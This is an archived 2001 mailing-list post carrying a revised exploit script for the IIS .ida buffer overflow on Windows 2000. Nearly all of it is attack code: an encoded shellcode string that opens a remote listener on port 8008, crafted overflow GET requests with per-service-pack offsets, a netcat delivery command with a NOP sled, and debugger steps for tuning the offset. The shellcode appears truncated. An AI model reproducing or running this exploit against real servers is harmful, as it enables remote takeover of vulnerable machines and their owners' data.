revised version of .ida exploit

From: JW Oh (matat_private)
Date: Mon Jul 23 2001 - 20:44:20 PDT

  • Next message: Seth Arnold: "Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0"

    Sorry previous one is wrong with some code.
    # .ida nasty exploit
    # matat_private,matat_private
    # If this exploit succeeds, you can get into the machine through port 8008
    # shellcode generated by DeepZone generator
    # I only tested this code under W2k Korean Version, so the offset value may vary through systems, you can get the offset value with WinDbg tool included in Windows SDK
    # How to get the offset:
    # 1. start windbg and attach to inetinfo.exe process. and go(F5)
    # 2. using this script attack the test machine
    # 3. if the offset in this script is not valid, then inetinfo.exe will be got break.
    # 4. you can search the shellcode position with following command
    #     s 10000 Lfffff 0x68 0x5e 0x56 0xc3 0x90
    # 5. if the shellcode position is 0xaabbccdd
    #    then you can change the %uccdd%uaabb
    SHELLCODE=`printf "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc!
    #for w2k no sp:
    #GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x HTTP/1.0"
    #for w2k sp2:
    GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x HTTP/1.0"
    nc $target 80 <<EOF
    `echo $GET_LINE`
    yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE

    This archive was generated by hypermail 2b30 : Tue Jul 24 2001 - 12:23:23 PDT